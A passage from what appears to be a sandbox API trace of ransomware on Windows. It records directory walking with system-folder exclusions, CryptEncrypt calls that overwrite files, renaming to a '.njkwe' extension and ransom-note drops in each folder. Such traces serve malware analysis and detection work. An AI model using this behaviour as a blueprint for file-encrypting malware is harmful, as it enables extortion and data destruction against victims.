ftLastWriteTime.dwLowDateTime=0x97ce8d28, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x60e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ppcrlconfig600.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1 [0073.508] lstrcmpiW (lpString1="ppcrlconfig600.dll", lpString2="Windows") returned -1 [0073.508] lstrcmpiW (lpString1="ppcrlconfig600.dll", lpString2="$Recycle.bin") returned 1 [0073.508] lstrcmpiW (lpString1="ppcrlconfig600.dll", lpString2="System Volume Information") returned -1 [0073.508] lstrcmpiW (lpString1="ppcrlconfig600.dll", lpString2="Program Files") returned -1 [0073.508] lstrcmpiW (lpString1="ppcrlconfig600.dll", lpString2="Program Files (x86)") returned -1 [0073.508] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll") returned 70 [0073.508] StrStrIW (lpFirst="ppcrlconfig600.dll", lpSrch=".njkwe") returned 0x0 [0073.508] lstrcmpW (lpString1="ppcrlconfig600.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.508] lstrcmpW (lpString1="ppcrlconfig600.dll", lpString2="taridd") returned -1 [0073.508] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.508] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\production\\ppcrlconfig600.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.509] GetTickCount () returned 0x1152bbf [0073.509] GetTickCount () returned 0x1152bbf [0073.509] GetTickCount () returned 0x1152bbf [0073.509] GetTickCount () returned 0x1152bbf [0073.509] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0073.509] GetProcessHeap () returned 0xbe0000 [0073.509] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0073.509] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0073.615] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.615] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2800, lpOverlapped=0x0) returned 1 [0073.616] GetProcessHeap () returned 0xbe0000 [0073.616] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0073.616] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.616] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0073.616] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0073.616] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0073.616] CloseHandle (hObject=0x434) returned 1 [0073.616] GetProcessHeap () returned 0xbe0000 [0073.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.616] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll_r00t_{3sXlE5}.njkwe") returned 90 [0073.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll" (normalized: "c:\\programdata\\microsoft\\identitycrl\\production\\ppcrlconfig600.dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\identitycrl\\production\\ppcrlconfig600.dll_r00t_{3sxle5}.njkwe")) returned 1 [0073.617] GetProcessHeap () returned 0xbe0000 [0073.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.617] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xbd80b503, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb66288f, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="temp", cAlternateFileName="")) returned 1 [0073.617] lstrcmpiW (lpString1="temp", lpString2="Windows") returned -1 [0073.617] lstrcmpiW (lpString1="temp", lpString2="$Recycle.bin") returned 1 [0073.617] lstrcmpiW (lpString1="temp", lpString2="System Volume Information") returned 1 [0073.617] lstrcmpiW (lpString1="temp", lpString2="Program Files") returned 1 [0073.617] lstrcmpiW (lpString1="temp", lpString2="Program Files (x86)") returned 1 [0073.617] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp") returned 56 [0073.617] lstrcmpW (lpString1="temp", lpString2=".") returned 1 [0073.617] lstrcmpW (lpString1="temp", lpString2="..") returned 1 [0073.617] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.617] GetProcessHeap () returned 0xbe0000 [0073.617] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.617] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\*") returned 58 [0073.617] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xbd80b503, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb66288f, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a220 [0073.618] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.618] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.618] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.618] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.619] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.619] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\.") returned 58 [0073.619] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.619] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xbd80b503, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb66288f, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.619] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.619] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.619] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.619] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.619] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.619] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\..") returned 59 [0073.619] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.619] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.619] FindNextFileW (in: hFindFile=0xc1a220, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xbd80b503, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb66288f, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.619] FindClose (in: hFindFile=0xc1a220 | out: hFindFile=0xc1a220) returned 1 [0073.619] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 88 [0073.619] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\temp\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\identitycrl\\production\\temp\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.620] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0073.621] CloseHandle (hObject=0x434) returned 1 [0073.621] GetProcessHeap () returned 0xbe0000 [0073.621] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.621] FindNextFileW (in: hFindFile=0xc1a3a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xbd80b503, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb66288f, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="temp", cAlternateFileName="")) returned 0 [0073.621] FindClose (in: hFindFile=0xc1a3a0 | out: hFindFile=0xc1a3a0) returned 1 [0073.621] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 83 [0073.621] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\production\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\identitycrl\\production\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.623] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.624] CloseHandle (hObject=0x430) returned 1 [0073.624] GetProcessHeap () returned 0xbe0000 [0073.624] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.624] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x46b00d5c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x46b00d5c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="production", cAlternateFileName="PRODUC~1")) returned 0 [0073.624] FindClose (in: hFindFile=0xc19e20 | out: hFindFile=0xc19e20) returned 1 [0073.625] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 72 [0073.625] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\identitycrl\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0073.625] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0073.626] CloseHandle (hObject=0x42c) returned 1 [0073.626] GetProcessHeap () returned 0xbe0000 [0073.626] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0073.626] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd80cc32, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MapData", cAlternateFileName="")) returned 1 [0073.626] lstrcmpiW (lpString1="MapData", lpString2="Windows") returned -1 [0073.626] lstrcmpiW (lpString1="MapData", lpString2="$Recycle.bin") returned 1 [0073.626] lstrcmpiW (lpString1="MapData", lpString2="System Volume Information") returned -1 [0073.626] lstrcmpiW (lpString1="MapData", lpString2="Program Files") returned -1 [0073.626] lstrcmpiW (lpString1="MapData", lpString2="Program Files (x86)") returned -1 [0073.626] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MapData") returned 36 [0073.626] lstrcmpW (lpString1="MapData", lpString2=".") returned 1 [0073.626] lstrcmpW (lpString1="MapData", lpString2="..") returned 1 [0073.626] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MapData", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.626] GetProcessHeap () returned 0xbe0000 [0073.626] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0073.626] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MapData\\*") returned 38 [0073.626] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MapData\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd80cc32, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19fe0 [0073.627] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.627] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.627] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.627] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.627] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.627] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MapData\\.") returned 38 [0073.627] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.627] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd80cc32, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.627] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.627] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.627] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.627] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.627] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.627] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MapData\\..") returned 39 [0073.627] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.627] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.627] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd80cc32, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.627] FindClose (in: hFindFile=0xc19fe0 | out: hFindFile=0xc19fe0) returned 1 [0073.627] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MapData\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 68 [0073.627] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MapData\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\mapdata\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0073.629] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0073.629] CloseHandle (hObject=0x42c) returned 1 [0073.630] GetProcessHeap () returned 0xbe0000 [0073.630] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0073.630] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80d7aa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8b18c4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MF", cAlternateFileName="")) returned 1 [0073.630] lstrcmpiW (lpString1="MF", lpString2="Windows") returned -1 [0073.630] lstrcmpiW (lpString1="MF", lpString2="$Recycle.bin") returned 1 [0073.630] lstrcmpiW (lpString1="MF", lpString2="System Volume Information") returned -1 [0073.630] lstrcmpiW (lpString1="MF", lpString2="Program Files") returned -1 [0073.630] lstrcmpiW (lpString1="MF", lpString2="Program Files (x86)") returned -1 [0073.630] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF") returned 31 [0073.630] lstrcmpW (lpString1="MF", lpString2=".") returned 1 [0073.630] lstrcmpW (lpString1="MF", lpString2="..") returned 1 [0073.630] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\MF", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.630] GetProcessHeap () returned 0xbe0000 [0073.630] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0073.630] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*") returned 33 [0073.630] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80d7aa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8b18c4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ce0 [0073.630] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.630] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.630] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.630] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.630] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.630] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\.") returned 33 [0073.630] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.630] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd80d7aa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8b18c4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.630] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.630] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.631] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.631] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.631] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.631] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\..") returned 34 [0073.631] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.631] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.631] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a8b18c4, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5ed1465, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5ed1465, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Active.GRL", cAlternateFileName="")) returned 1 [0073.631] lstrcmpiW (lpString1="Active.GRL", lpString2="Windows") returned -1 [0073.631] lstrcmpiW (lpString1="Active.GRL", lpString2="$Recycle.bin") returned 1 [0073.631] lstrcmpiW (lpString1="Active.GRL", lpString2="System Volume Information") returned -1 [0073.631] lstrcmpiW (lpString1="Active.GRL", lpString2="Program Files") returned -1 [0073.631] lstrcmpiW (lpString1="Active.GRL", lpString2="Program Files (x86)") returned -1 [0073.631] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL") returned 42 [0073.631] StrStrIW (lpFirst="Active.GRL", lpSrch=".njkwe") returned 0x0 [0073.631] lstrcmpW (lpString1="Active.GRL", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.631] lstrcmpW (lpString1="Active.GRL", lpString2="taridd") returned -1 [0073.631] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.631] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\programdata\\microsoft\\mf\\active.grl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.631] GetTickCount () returned 0x1152c3c [0073.631] GetTickCount () returned 0x1152c3c [0073.631] GetTickCount () returned 0x1152c3c [0073.631] GetTickCount () returned 0x1152c3c [0073.631] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f4a8*, pdwDataLen=0x380f558*=0x2c, dwBufLen=0x80 | out: pbData=0x380f4a8*, pdwDataLen=0x380f558*=0x80) returned 1 [0073.631] GetProcessHeap () returned 